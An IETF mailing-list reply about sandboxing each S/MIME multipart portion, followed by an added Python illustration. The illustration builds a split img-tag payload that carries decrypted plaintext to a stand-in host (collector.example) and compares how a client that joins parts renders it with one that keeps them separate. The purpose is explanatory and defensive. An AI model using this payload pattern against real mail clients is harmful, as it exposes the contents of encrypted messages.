Re: More mail madness?

Russ Housley <housley@vigilsec.com> Mon, 14 May 2018 16:37 UTC

From: Russ Housley <housley@vigilsec.com>
Message-Id: <C8E07D79-DFC5-4DA5-981B-26AA91A04D09@vigilsec.com>
Subject: Re: More mail madness?
Date: Mon, 14 May 2018 12:37:28 -0400
In-Reply-To: <51B631EC-78B3-4FF4-A82C-725A029F3DB3@nohats.ca>
Cc: Phillip Hallam-Baker <phill@hallambaker.com>, IETF <ietf@ietf.org>, LAMPS <spasm@ietf.org>
To: Paul Wouters <paul@nohats.ca>
References: <CAMm+LwiOfdptL6u=SyCtQnz7xKrJD6HTDkKs+JGeHf54CSiv8A@mail.gmail.com> <B0CE44DF-DC7C-4411-B1CC-30B87E38D3F6@vigilsec.com> <51B631EC-78B3-4FF4-A82C-725A029F3DB3@nohats.ca>
Archived-At: <https://mailarchive.ietf.org/arch/msg/ietf/X1TOUY0uXjo29mUz0_dLRZvYWvM>

> On May 14, 2018, at 12:35 PM, Paul Wouters <paul@nohats.ca> wrote:
> 
>> On May 14, 2018, at 12:29, Russ Housley <housley@vigilsec.com> wrote:
>> 
>> We are working on text for S/MIME that says that each portion of a MIME multi-part needs to be handled in its own sandbox.  The direct exfiltration that is described happens because the mail user agent glues the various portions together for display to the user, which in the example on the web page causes an image to be fetched from the attacker's website with the message plaintext as part of the URL.
> 
> So that’s the bandaid. What and where will work be done on a solution?

LAMPS just sent an update to the S/MIME message document to the IESG.  My guess is that there will be discussion on the spasm@ietf.org mail list.

Russ
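
The gluing behaviour described in the quoted text, next to per-part handling, as an added example that is not part of the original message or of the S/MIME document. The host name, message text and function names are constructed, and Python's html.parser stands in for the mail user agent's HTML renderer.

```python
from html.parser import HTMLParser

# Constructed sample: three MIME body parts as a mail client sees them after
# decryption. Host name and message text are made up for illustration.
SECRET = "Budget review moved to 3pm"
PARTS = [
    ("text/html", '<img src="http://collector.example/?d='),  # attribute left open
    ("text/plain", SECRET),                                    # decrypted part
    ("text/html", '">'),                                       # closes the attribute
]


class RemoteRefs(HTMLParser):
    """Collect URLs a renderer would fetch (src/href attribute values)."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("src", "href") and value:
                self.urls.append(value)


def urls_in(html):
    parser = RemoteRefs()
    parser.feed(html)
    parser.close()
    return parser.urls


def glued_render(parts):
    """Behaviour described in the thread: all parts joined into one document."""
    return urls_in("".join(body for _, body in parts))


def sandboxed_render(parts):
    """Each part is its own document; text/plain is never parsed as HTML."""
    urls = []
    for ctype, body in parts:
        if ctype == "text/html":
            urls.extend(urls_in(body))
    return urls


def leaks(urls, secret):
    """URLs that would carry the decrypted text to a remote host."""
    return [u for u in urls if secret in u]
```

Comparing `leaks(glued_render(PARTS), SECRET)` with `leaks(sandboxed_render(PARTS), SECRET)` shows that the plaintext reaches a fetchable URL only when the parts are joined before parsing.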